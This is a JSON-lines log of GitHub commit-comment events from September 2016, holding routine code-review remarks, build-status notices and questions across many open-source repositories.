{"id":"4567217793","type":"CommitCommentEvent","actor":{"login":"Maartenwut"},"repo":{"name":"Maartenwut/DeCirkeltrekBot"},"payload":{"comment":{"id":19033455,"position":null,"line":null,"path":null,"commit_id":"5093010da10d7580344e6295f0375474daebac6d","created_at":"2016-09-15T10:14:51Z","updated_at":"2016-09-15T10:14:51Z","body":"Bennikrechts?"}},"created_at":"2016-09-15T10:14:51Z"}
{"id":"4567218981","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19033458,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T10:15:07Z","updated_at":"2016-09-15T10:15:07Z","body":"@tanwanirahul for now I do not think maintaining different branches in XGBooost branch is the adopted release strategy. If you like, you can maintain a version in a different repository "}},"created_at":"2016-09-15T10:15:07Z"}
{"id":"4567222581","type":"CommitCommentEvent","actor":{"login":"rmartinho"},"repo":{"name":"ericniebler/range-v3"},"payload":{"comment":{"id":19033465,"position":42,"line":316,"path":"include/range/v3/detail/config.hpp","commit_id":"4cfcb59c3db1c279d72c64ccf15de3c724a0362d","created_at":"2016-09-15T10:15:55Z","updated_at":"2016-09-15T10:15:55Z","body":"May I ask what's the rationale behind this choice? AFAIU `inline` variables don't really provide new functionality; they are purely a more convenient syntax for functionality that already existed. So, under that assumption:\r\n\r\n - the two branches of this `#if` are functionally-equivalent; and\r\n - the convenience of inline variables will never be enjoyed because we will be using the macro anyway.\r\n\r\nSo what's the gain?"}},"created_at":"2016-09-15T10:15:55Z"}
{"id":"4567224336","type":"CommitCommentEvent","actor":{"login":"jjal"},"repo":{"name":"fielded/angular-nav-thresholds"},"payload":{"comment":{"id":19033468,"position":null,"line":null,"path":null,"commit_id":"c827b35947a3b95bf07bc90b96a8c1a0c5772d74","created_at":"2016-09-15T10:16:18Z","updated_at":"2016-09-15T10:16:18Z","body":"lgtm"}},"created_at":"2016-09-15T10:16:18Z"}
{"id":"4567228523","type":"CommitCommentEvent","actor":{"login":"kevva"},"repo":{"name":"kevva/imgur-uploader"},"payload":{"comment":{"id":19033480,"position":13,"line":12,"path":"index.js","commit_id":"eac2f0a535f504a169d04dfe49f0a5367cb9a4a4","created_at":"2016-09-15T10:17:13Z","updated_at":"2016-09-15T10:17:13Z","body":"Took me some time to figure this out. According to their documentation a `binary` should work. So I tried using `buf` as is (since it works without options) but then it threw `500`. Converting it to `base64` fixed it though, but yeah, took me so long..."}},"created_at":"2016-09-15T10:17:13Z"}
{"id":"4567229050","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"Shougo/unite.vim"},"payload":{"comment":{"id":19033481,"position":null,"line":null,"path":null,"commit_id":"f07a1a00963f4b0aa336f37e9a11394dbd85c015","created_at":"2016-09-15T10:17:19Z","updated_at":"2016-09-15T10:17:19Z","body":"@Shougo Are you going to support Vim 8.0 async API in denite?"}},"created_at":"2016-09-15T10:17:19Z"}
{"id":"4567237040","type":"CommitCommentEvent","actor":{"login":"kbtorun"},"repo":{"name":"kbtorun/sltest"},"payload":{"comment":{"id":19033507,"position":null,"line":null,"path":null,"commit_id":"4e5c997969516f743d8f16e178bd798fbbb34076","created_at":"2016-09-15T10:19:12Z","updated_at":"2016-09-15T10:19:12Z","body":"qqqqq"}},"created_at":"2016-09-15T10:19:12Z"}
{"id":"4567238939","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033515,"position":null,"line":null,"path":null,"commit_id":"9c7f1e515966cbaa4d13cb4780a8c46703f8ada8","created_at":"2016-09-15T10:19:37Z","updated_at":"2016-09-15T10:19:37Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 29](http://munit-050:8112/tc/viewLog.html?buildId=99043&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:3"}},"created_at":"2016-09-15T10:19:37Z"}
{"id":"4567238968","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033516,"position":null,"line":null,"path":null,"commit_id":"08cedb54d51638a57555746eece720230dd8237f","created_at":"2016-09-15T10:19:37Z","updated_at":"2016-09-15T10:19:37Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 30](http://munit-050:8112/tc/viewLog.html?buildId=99044&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T10:19:37Z"}
{"id":"4567241483","type":"CommitCommentEvent","actor":{"login":"jumping2000"},"repo":{"name":"jumping2000/mysensors"},"payload":{"comment":{"id":19033526,"position":null,"line":null,"path":null,"commit_id":"822b21afe918bf138b894f00ae9b22b408c9155a","created_at":"2016-09-15T10:20:11Z","updated_at":"2016-09-15T10:20:11Z","body":"My Sensors 2.0 ESP8266 gateway with DHT22 temperature sensor and IoT integration"}},"created_at":"2016-09-15T10:20:11Z"}
{"id":"4567242704","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19033529,"position":6,"line":24,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-15T10:20:26Z","updated_at":"2016-09-15T10:20:26Z","body":"argumentsで、関数の引数の配列を引き取れるのは、初めて知りました！\r\nこの書き方は面白いですね。\r\n\r\n上記だとargsとargumentsが同じ内容になる気がしましたがいかがでしょう？\r\n\r\n余談ですが、JavaScriptの最近の仕様では、\r\n`for (v of arr) {}`\r\nで配列の値でループが回せるようになっています。\r\n\r\n`in`の文法だとオブジェクトのprototypeもループで回ってしまうことがあるので注意が必要です。\r\nhttp://qiita.com/C058/items/e1bcd1617188260a9443\r\n\r\nあくまで余談ですので、`for ... of`には書き換えなくて結構です。"}},"created_at":"2016-09-15T10:20:26Z"}
{"id":"4567248242","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19033549,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T10:21:43Z","updated_at":"2016-09-15T10:21:43Z","body":"@PawelGutkowski, are you looking into Travis CI failures? Is there any way to get server logs and display them in Travis-CI results?"}},"created_at":"2016-09-15T10:21:43Z"}
{"id":"4567250221","type":"CommitCommentEvent","actor":{"login":"arekpalinski"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19033555,"position":5,"line":120,"path":"src/Sparrow/Json/LazyStringValue.cs","commit_id":"3504a3b8086748f300b8af9dd4d41b5c0d007976","created_at":"2016-09-15T10:22:13Z","updated_at":"2016-09-15T10:22:13Z","body":"@ayende Why did you decide to use `XXHash32` here? Performance? I'm wondering if I should apply the same change in https://github.com/ayende/ravendb/blob/v4.0/src/Raven.Server/Documents/Indexes/MapReduce/ReduceKeyProcessor.cs"}},"created_at":"2016-09-15T10:22:13Z"}
{"id":"4567252231","type":"CommitCommentEvent","actor":{"login":"sagund07"},"repo":{"name":"ThemeBoy/SportsPress"},"payload":{"comment":{"id":19033563,"position":null,"line":null,"path":null,"commit_id":"c7c87cc4d18dbb0c2293ae04777fe352502c353d","created_at":"2016-09-15T10:22:40Z","updated_at":"2016-09-15T10:22:40Z","body":"Thanks! :)"}},"created_at":"2016-09-15T10:22:40Z"}
{"id":"4567257875","type":"CommitCommentEvent","actor":{"login":"midzata"},"repo":{"name":"midzata/hello-world"},"payload":{"comment":{"id":19033572,"position":null,"line":null,"path":null,"commit_id":"6e472d72567cd599814ee639a115ae21267a4ea2","created_at":"2016-09-15T10:24:02Z","updated_at":"2016-09-15T10:24:02Z","body":"ova se probav da go menam vrakajki se nazad o 6toto ali nema opcija"}},"created_at":"2016-09-15T10:24:02Z"}
{"id":"4567260040","type":"CommitCommentEvent","actor":{"login":"timbaker1991"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19033574,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-15T10:24:34Z","updated_at":"2016-09-15T10:24:34Z","body":"Has this bug fix been included in 2.1.1? I can't see it in the change notes? http://devdocs.magento.com/guides/v2.1/release-notes/ReleaseNotes2.1.1CE.html"}},"created_at":"2016-09-15T10:24:34Z"}
{"id":"4567260446","type":"CommitCommentEvent","actor":{"login":"kesnfs"},"repo":{"name":"flocke/ElementalX_Nexus5X"},"payload":{"comment":{"id":19033575,"position":null,"line":null,"path":null,"commit_id":"a975787f1eacd422e3b4b2ab00252103ef6cb5d1","created_at":"2016-09-15T10:24:42Z","updated_at":"2016-09-15T10:24:42Z","body":"@flocke hello, Jakob, sorry for dusturbing you. A year ago you made script for changing selinux to permissive\r\nI'm about this post: https://plus.google.com/+JakobNixdorf/posts/BQ7CzPNzZx6\r\nCan you share this script again? Link is broken"}},"created_at":"2016-09-15T10:24:42Z"}
{"id":"4567261145","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19033578,"position":13,"line":31,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-15T10:24:52Z","updated_at":"2016-09-15T10:24:52Z","body":"質問です。\r\nreadline.promptの第一引数が`true`となるとどういう動作なるのでしょう？"}},"created_at":"2016-09-15T10:24:52Z"}
{"id":"4567261971","type":"CommitCommentEvent","actor":{"login":"sns-seb"},"repo":{"name":"SonarSource/sonarqube"},"payload":{"comment":{"id":19033581,"position":31,"line":58,"path":"server/sonar-web/src/main/webapp/WEB-INF/app/models/property.rb","commit_id":"77bd719aedd53e98d72ea00a656773fe7e0a4e48","created_at":"2016-09-15T10:25:03Z","updated_at":"2016-09-15T10:25:03Z","body":"I hadn't seen this comment was related to Stas' PR.\r\n\r\nI have a few questions before applying this change:\r\n\r\n1. How is this fixing the issue? Why did not use `to_i` cause the property to not be changing?\r\n2. method `saveProperty` takes `Long` arguments, shouldn't it be `resource_id.to_l` (if it even exists)"}},"created_at":"2016-09-15T10:25:03Z"}
{"id":"4567269901","type":"CommitCommentEvent","actor":{"login":"anmoldeep"},"repo":{"name":"tdbt1985/Serler_Stream2"},"payload":{"comment":{"id":19033604,"position":null,"line":null,"path":null,"commit_id":"fe5d7a48e7cbaec65b9da82c5ad7b7421378403d","created_at":"2016-09-15T10:26:56Z","updated_at":"2016-09-15T10:26:56Z","body":"Peer Review Performed. Looks Good."}},"created_at":"2016-09-15T10:26:56Z"}
{"id":"4567271169","type":"CommitCommentEvent","actor":{"login":"SpotlightKid"},"repo":{"name":"SpotlightKid/python-rtmidi"},"payload":{"comment":{"id":19033606,"position":5,"line":291,"path":"src/_rtmidi.pyx","commit_id":"f01b44c9540b804946308727fbd99addffa6dc65","created_at":"2016-09-15T10:27:15Z","updated_at":"2016-09-15T10:27:15Z","body":"Thanks, copy and paste error :("}},"created_at":"2016-09-15T10:27:15Z"}
{"id":"4567274762","type":"CommitCommentEvent","actor":{"login":"SpotlightKid"},"repo":{"name":"SpotlightKid/python-rtmidi"},"payload":{"comment":{"id":19033617,"position":null,"line":null,"path":null,"commit_id":"80b450706ad6f1ada8bc51404b8364a458b2084c","created_at":"2016-09-15T10:28:08Z","updated_at":"2016-09-15T10:28:08Z","body":"Many thanks for writing these tests!"}},"created_at":"2016-09-15T10:28:08Z"}
{"id":"4567275003","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19033618,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T10:28:12Z","updated_at":"2016-09-15T10:28:12Z","body":"There are some logs accessible in sauce labs:\r\n![image](https://cloud.githubusercontent.com/assets/17570261/18546666/663ff896-7b3f-11e6-948e-6cb5c422d007.png)\r\nOnly way to display server logs I see is to access openmrs.log in docker container in after-script, and display its content with `tail` or some other bash command..."}},"created_at":"2016-09-15T10:28:12Z"}
{"id":"4567278888","type":"CommitCommentEvent","actor":{"login":"maver1ck"},"repo":{"name":"dataArtisans/flink-training-exercises"},"payload":{"comment":{"id":19033623,"position":122,"line":122,"path":"src/main/java/com/dataartisans/flinktraining/exercises/datastream_java/state/TravelTimePrediction.java","commit_id":"ed4a3429a253fd056f7c3e882e22e9df38d05c59","created_at":"2016-09-15T10:29:09Z","updated_at":"2016-09-15T10:29:09Z","body":"I mentioned this on training.\r\nI think `TravelTimePredictionModel` class should be Serializable.\r\nThis gives us another solution of this problem by implementing `PredictionModel` as Checkpointed"}},"created_at":"2016-09-15T10:29:09Z"}
{"id":"4567279412","type":"CommitCommentEvent","actor":{"login":"nene"},"repo":{"name":"zeroturnaround/sql-formatter"},"payload":{"comment":{"id":19033626,"position":null,"line":null,"path":null,"commit_id":"23ffcf859620907a0d4a4f6ad7df0b5214c93615","created_at":"2016-09-15T10:29:15Z","updated_at":"2016-09-15T10:29:15Z","body":"`babel-polyfill` should be in our dependencies, not in devDependencies."}},"created_at":"2016-09-15T10:29:15Z"}
{"id":"4567280184","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19033633,"position":null,"line":null,"path":null,"commit_id":"e961bfaa33abb31db484355358f536c1bfa6e8b4","created_at":"2016-09-15T10:29:27Z","updated_at":"2016-09-15T10:29:27Z","body":"Changed holding variable type to Object[] to avoid cast exception for any spark plugin."}},"created_at":"2016-09-15T10:29:27Z"}
{"id":"4567280408","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19033634,"position":null,"line":null,"path":null,"commit_id":"751aa05cd29f1d1933e6a6568dd1835adfefacf9","created_at":"2016-09-15T10:29:30Z","updated_at":"2016-09-15T10:29:30Z","body":"Looks good"}},"created_at":"2016-09-15T10:29:30Z"}
{"id":"4567280999","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033636,"position":null,"line":null,"path":null,"commit_id":"08cedb54d51638a57555746eece720230dd8237f","created_at":"2016-09-15T10:29:39Z","updated_at":"2016-09-15T10:29:39Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 30](http://munit-050:8112/tc/viewLog.html?buildId=99044&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T10:29:39Z"}
{"id":"4567281023","type":"CommitCommentEvent","actor":{"login":"Ankitsrist"},"repo":{"name":"typicode/jsonplaceholder"},"payload":{"comment":{"id":19033637,"position":null,"line":null,"path":null,"commit_id":"4df8ecb7dd546ab86ef6a8e2cf75f8c9152d9417","created_at":"2016-09-15T10:29:39Z","updated_at":"2016-09-15T10:29:39Z","body":"It should be 4"}},"created_at":"2016-09-15T10:29:39Z"}
{"id":"4567281379","type":"CommitCommentEvent","actor":{"login":"InfernoZeus"},"repo":{"name":"bastimeyer/livestreamer-twitch-gui"},"payload":{"comment":{"id":19033638,"position":null,"line":null,"path":null,"commit_id":"a5a523225d37ebc046eb0303d90e585ca80a44bc","created_at":"2016-09-15T10:29:43Z","updated_at":"2016-09-15T10:29:43Z","body":"Done :smiley: "}},"created_at":"2016-09-15T10:29:43Z"}
{"id":"4567284028","type":"CommitCommentEvent","actor":{"login":"SadakSalahEddine"},"repo":{"name":"SadakSalahEddine/HelloWord"},"payload":{"comment":{"id":19033646,"position":null,"line":null,"path":null,"commit_id":"b8ac49c2c9430ef2840d3cf02638b46e3b3610ca","created_at":"2016-09-15T10:30:21Z","updated_at":"2016-09-15T10:30:21Z","body":"firstcommit"}},"created_at":"2016-09-15T10:30:21Z"}
{"id":"4567289720","type":"CommitCommentEvent","actor":{"login":"tjonganthony"},"repo":{"name":"KhooDesmond/commIT-homework"},"payload":{"comment":{"id":19033656,"position":null,"line":null,"path":null,"commit_id":"bc67a0c348fe19294cc4bdfdb491764ff4714b4d","created_at":"2016-09-15T10:31:43Z","updated_at":"2016-09-15T10:31:43Z","body":"Use deeper indentation for each component.\r\nSuch as\r\n```\r\n<div>\r\n    some content\r\n    <section>\r\n        some other content\r\n    </section>\r\n</div>\r\n```"}},"created_at":"2016-09-15T10:31:43Z"}
{"id":"4567290083","type":"CommitCommentEvent","actor":{"login":"Emp5ex"},"repo":{"name":"GenieTec/Android-Game-Engine"},"payload":{"comment":{"id":19033658,"position":null,"line":null,"path":null,"commit_id":"df13521631e33eb6470a204d34cdcea070b90417","created_at":"2016-09-15T10:31:49Z","updated_at":"2016-09-15T10:31:49Z","body":"will re upload"}},"created_at":"2016-09-15T10:31:49Z"}
{"id":"4567291471","type":"CommitCommentEvent","actor":{"login":"FBerendsen"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19033663,"position":null,"line":null,"path":null,"commit_id":"7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7","created_at":"2016-09-15T10:32:09Z","updated_at":"2016-09-15T10:32:09Z","body":"For coding make-up style you should run the Uncrustify. src/Tools/selxUncrustify.py"}},"created_at":"2016-09-15T10:32:09Z"}
{"id":"4567292221","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19033666,"position":247,"line":647,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-15T10:32:17Z","updated_at":"2016-09-15T10:32:17Z","body":"Good point!\r\ndone"}},"created_at":"2016-09-15T10:32:17Z"}
{"id":"4567292271","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19033667,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T10:32:18Z","updated_at":"2016-09-15T10:32:18Z","body":"I like the idea with after-script. Unfortunately, the stacktrace, which can be seen in the screenshot doesn't help me much."}},"created_at":"2016-09-15T10:32:18Z"}
{"id":"4567293552","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033671,"position":null,"line":null,"path":null,"commit_id":"c90650a74e57ffa20051da0e15098c4732bb1fd1","created_at":"2016-09-15T10:32:36Z","updated_at":"2016-09-15T10:32:36Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 31](http://munit-050:8112/tc/viewLog.html?buildId=99046&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T10:32:36Z"}
{"id":"4567293801","type":"CommitCommentEvent","actor":{"login":"sknorr"},"repo":{"name":"SUSE/doc-sle"},"payload":{"comment":{"id":19033672,"position":33,"line":14939,"path":"xml/ay_bigfile.xml","commit_id":"0441abd675837fc3b1688e69be50d68420163676","created_at":"2016-09-15T10:32:40Z","updated_at":"2016-09-15T10:32:40Z","body":"Thanks. Fixed."}},"created_at":"2016-09-15T10:32:40Z"}
{"id":"4567295310","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19033684,"position":140,"line":540,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-15T10:33:01Z","updated_at":"2016-09-15T10:33:01Z","body":"Also p2_it is updated to p2_2_it every iteration"}},"created_at":"2016-09-15T10:33:01Z"}
{"id":"4567297098","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19033689,"position":67,"line":467,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-15T10:33:28Z","updated_at":"2016-09-15T10:33:28Z","body":"I drew stuff"}},"created_at":"2016-09-15T10:33:28Z"}
{"id":"4567297169","type":"CommitCommentEvent","actor":{"login":"leostaples"},"repo":{"name":"BBC-News/alephant-renderer"},"payload":{"comment":{"id":19033690,"position":null,"line":null,"path":null,"commit_id":"01c33a4a79195c7684f0725723bdb97a6030d326","created_at":"2016-09-15T10:33:29Z","updated_at":"2016-09-15T10:33:29Z","body":"I think this change means that using a partial path for a component causes errors, as subsequent components also try to use this partial path, e.g. https://github.com/BBC-News/election-2016-renderer/blob/master/src/components/london_banner/models/london_banner.rb#L12"}},"created_at":"2016-09-15T10:33:29Z"}
{"id":"4567298819","type":"CommitCommentEvent","actor":{"login":"dschwank"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19033694,"position":66,"line":159,"path":"config/webpack.common.js","commit_id":"dd1276b4989319a66e189ee78b87dc86a3a451a1","created_at":"2016-09-15T10:33:53Z","updated_at":"2016-09-15T10:33:53Z","body":"Hmm ... Using the committed settings I always get the following error within the browser:\r\n\r\n> Uncaught Error: Expected 'styles' to be an array of strings.\r\n\r\nI use the SCSS files within the `app.component.ts` in the following way:\r\n```\r\n@Component({\r\n  selector: 'app',\r\n  encapsulation: ViewEncapsulation.None,\r\n  styleUrls: [\r\n    './app.style.scss'\r\n  ],\r\n  templateUrl: 'app.tpl.html'\r\n})\r\n```"}},"created_at":"2016-09-15T10:33:53Z"}
{"id":"4567300393","type":"CommitCommentEvent","actor":{"login":"SrhebbarMicrosoft"},"repo":{"name":"SrhebbarMicrosoft/Bugbash"},"payload":{"comment":{"id":19033699,"position":null,"line":null,"path":null,"commit_id":"05e8cf89c463517c19cb6f127f0bd17504bf157a","created_at":"2016-09-15T10:34:17Z","updated_at":"2016-09-15T10:34:17Z","body":"Testing comment"}},"created_at":"2016-09-15T10:34:17Z"}
{"id":"4567300638","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19033700,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T10:34:20Z","updated_at":"2016-09-15T10:34:20Z","body":"I don't know why its doing it like this though... why is it not just checking the count of `SPRITE_LIST_NULL` and if its 0 return null?"}},"created_at":"2016-09-15T10:34:20Z"}
{"id":"4567302015","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19033703,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T10:34:40Z","updated_at":"2016-09-15T10:34:40Z","body":"If you want, I can try to setup after-script"}},"created_at":"2016-09-15T10:34:40Z"}
{"id":"4567304535","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19033708,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-15T10:35:18Z","updated_at":"2016-09-15T10:35:18Z","body":"It is ok for me, probably\n\nBitboard defensive = pieces(color_of(piece_on(s)));\n\nwill be slower than original version because it is executed always, while\nthe original version only in very rare cases. So I suggest to drop this to\nhave higher chances to pass the test.\n\n\nOn Thu, Sep 15, 2016 at 10:49 AM, pb00068 <notifications@github.com> wrote:\n\n> @mcostalba <https://github.com/mcostalba> @snicolet\n> <https://github.com/snicolet> I have prepared branch\n> <https://github.com/pb00068/Stockfish/tree/correctpin3> for another\n> bugfix-attempt. As suggested by Stephane it includes also the bug-fix\n> proposed by Ronald to run both fixes within a single SPRT[-3,1] test. Can\n> you please take a look at this and say if this should be the next bug-fix\n> attempt (hopefully the last one) we should run? Thanks in advance\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mcostalba/Stockfish/commit/ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87#commitcomment-19032505>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGAVmFVgdTChWvqbi92nqHBD1fTQzCks5qqQaGgaJpZM4J6qB8>\n> .\n>\n"}},"created_at":"2016-09-15T10:35:18Z"}
{"id":"4567308050","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19033717,"position":null,"line":null,"path":null,"commit_id":"9dabfd7dace3218072f47bd15d75cf8f8701c932","created_at":"2016-09-15T10:36:06Z","updated_at":"2016-09-15T10:36:06Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35436/testReport/) for this commit**"}},"created_at":"2016-09-15T10:36:06Z"}
{"id":"4567311375","type":"CommitCommentEvent","actor":{"login":"ayende"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19033727,"position":5,"line":120,"path":"src/Sparrow/Json/LazyStringValue.cs","commit_id":"3504a3b8086748f300b8af9dd4d41b5c0d007976","created_at":"2016-09-15T10:36:45Z","updated_at":"2016-09-15T10:36:45Z","body":"The conversion to int was taking a bit of time here, actually\r\n"}},"created_at":"2016-09-15T10:36:45Z"}
{"id":"4567312634","type":"CommitCommentEvent","actor":{"login":"Manishkumar85"},"repo":{"name":"Manishkumar85/Indianmanish"},"payload":{"comment":{"id":19033730,"position":2,"line":2,"path":"README.md","commit_id":"ae4a856c21522212257ca3ac8a4ef241c0483c4e","created_at":"2016-09-15T10:37:00Z","updated_at":"2016-09-15T10:37:00Z","body":"Hello\r\n"}},"created_at":"2016-09-15T10:37:00Z"}
{"id":"4567312794","type":"CommitCommentEvent","actor":{"login":"rockfruit"},"repo":{"name":"bikalabs/bika.lims"},"payload":{"comment":{"id":19033731,"position":7,"line":260,"path":"bika/lims/browser/calcs.py","commit_id":"1a28009617bc2f61a518afa02d46c55ad49af9ed","created_at":"2016-09-15T10:37:02Z","updated_at":"2016-09-15T10:37:02Z","body":"who is \"root\"? I really want to know who I can complain to about shadowing the method parameter 'uid'! https://jira.bikalabs.com/browse/LIMS-2394 "}},"created_at":"2016-09-15T10:37:02Z"}
{"id":"4567313965","type":"CommitCommentEvent","actor":{"login":"lindemann09"},"repo":{"name":"expyriment/expyriment"},"payload":{"comment":{"id":19033736,"position":null,"line":null,"path":null,"commit_id":"b09a7461028fc8f05bc17d4516cba1033fd1d3bb","created_at":"2016-09-15T10:37:18Z","updated_at":"2016-09-15T10:37:18Z","body":"Fine!"}},"created_at":"2016-09-15T10:37:18Z"}
{"id":"4567314977","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19033738,"position":19,"line":19,"path":"CampChallenge_PHP/006.データベース/database_practice.html","commit_id":"9d971df03e02d9e1c43d7bb94421a61b17a606c3","created_at":"2016-09-15T10:37:31Z","updated_at":"2016-09-15T10:37:31Z","body":"添田です。\r\nちゃんとDBの型とかを調べるのは良いですね！僕らが教えない事も多いので、自分から積極的に取りにいってください！"}},"created_at":"2016-09-15T10:37:31Z"}
{"id":"4567317111","type":"CommitCommentEvent","actor":{"login":"mmzoo"},"repo":{"name":"reactotron/reactotron"},"payload":{"comment":{"id":19033747,"position":57,"line":57,"path":"packages/reactotron-apisauce/package.json","commit_id":"97d86c73835b041deca77730b05d06d7aee78b14","created_at":"2016-09-15T10:38:00Z","updated_at":"2016-09-15T10:38:00Z","body":"As far as I [can see here](https://github.com/skellock/apisauce/blob/ede9c33c6b972330d14b432d8d9ef0341c2933b4/package.json#L32), `apisauce 0.3.0` depends on `ramda 0.21.0`. \r\n\r\nSo it's not possible to install `reactotron-apisauce 1.1.2`, is it? Because [at the moment](https://github.com/reactotron/reactotron/blob/f6cc33236fef68063850b17954751198678fd98f/packages/reactotron-apisauce/package.json#L57-L58) that requires both `apisauce 0.3.0` and `ramda 0.22.1`.\r\n\r\nI'm in dependency hell right now and seek a way out :)"}},"created_at":"2016-09-15T10:38:00Z"}
{"id":"4567317156","type":"CommitCommentEvent","actor":{"login":"rockfruit"},"repo":{"name":"bikalabs/bika.lims"},"payload":{"comment":{"id":19033748,"position":7,"line":260,"path":"bika/lims/browser/calcs.py","commit_id":"1a28009617bc2f61a518afa02d46c55ad49af9ed","created_at":"2016-09-15T10:38:01Z","updated_at":"2016-09-15T10:38:01Z","body":"Actually, I usually don't complain - but I always do want to know."}},"created_at":"2016-09-15T10:38:01Z"}
{"id":"4567321114","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19033759,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T10:38:57Z","updated_at":"2016-09-15T10:38:57Z","body":"Yes, please do.\r\n\r\n@dkayiwa, @wluyima, do you recall any changes you merged in the last 12 hours, which could cause the above exception? It doesn't seem like upgrading coreapps could cause that."}},"created_at":"2016-09-15T10:38:57Z"}
